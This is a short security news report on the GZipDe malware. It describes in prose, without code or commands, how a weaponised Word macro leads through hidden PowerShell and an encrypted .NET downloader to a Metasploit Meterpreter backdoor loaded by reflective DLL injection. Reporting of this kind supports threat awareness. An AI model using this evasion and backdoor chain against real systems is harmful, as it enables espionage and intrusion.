To use Cyware you must have cookies enabled. By Registering or Signing in, you agree to our Terms and Privacy Policy. You can also signup using Google Account. We will not use your credentials to import contacts or post anything on your account without your permission.For more info, please see Login FAQ.

New GZipDe malware spotted serving up Metasploit backdoor

Security researchers have discovered a new malware strain dubbed GZIpDe that appears to be a part of a targeted cyberespionage campaign and drops a Metasploit backdoor. According to AlienVault researchers, the malware was detected after a user from Afghanistan uploaded a weaponized Microsoft Word document on VirusTotal.

"Although the final goal seems to be the installation of a Metasploit backdoor, we found an interesting .NET downloader which uses a custom encryption method to obfuscate process memory and evade antivirus detection," AlienVault researcher Jose Manuel Martin wrote in a blog post.

The malicious decoy document embedded with macro malware that contained text taken from an article published in May about the next Shanghai Coorperation Organization Summit. If opened, a Visual Basic script stored as a hexadecimal stream is executed that runs a new task in a hidden Powershell console. A PE32 executable is downloaded which drops the GZipDe malware.

The payload contained shellcode that contacts the server which is currently offline. Researchers said Shodan happened to index the server and recorded it serving a Metasploit payload.

"It contains shellcode to bypass system detection and a Meterpreter payload - a capable backdoor," researchers noted. "For example, it can gather information from the system and contact the command and control server to receive further commands."

The shellcode also loads the entire DLL into memory, allowing it to operate without writing information into the disk in an operation named Reflective DLL injection. The attacker can then drop any payload to gain elevated privileges and move laterally within the local network.

This shellcode loads the entire DLL into memory, so it’s able to operate while writing no information into the disk. This operation is called Reflective DLL injection. From this point, the attacker can transmit any other payload in order to acquire elevated privileges and move within the local network.

Cybercriminals are increasingly opting for ready-made, available tools such as Metasploit or Cobalt Strike rather than custom malware for targeted attacks. It is still unclear who is behind the GZipDe malware and what their end goal is.

"We’ve only seen one sample of the malware," AlienValt security researcher Chris Doman told Bleeping Computer. "It seems very targeted. Given the decoy document is in English and uploaded from Afghanistan, it may have been targeting someone in an embassy or similar there."

Who we are

Cyware is a first-of-its-kind, comprehensive cyber situational awareness platform, designed to help you stay informed about the latest happenings in the cyber world with expertly curated news stories and updates.

Our Technology

Let IBM's Watson Find the Right News For You

The cyber threat landscape is changing rapidly, and cybersecurity news has claimed its spot on the front pages in recent months. It's not easy to find the right information from tens of thousands of cyber news articles and feeds published every day. Our machine learning based curation engine brings you the most relevant cyber content based on your needs.

Receive Daily Cyber News in Your Inbox

From the latest cyber security trends and innovations to new malware, vulnerabilities and threat intelligence, we bring you the most up-to date and relevant cyber updates and news alerts.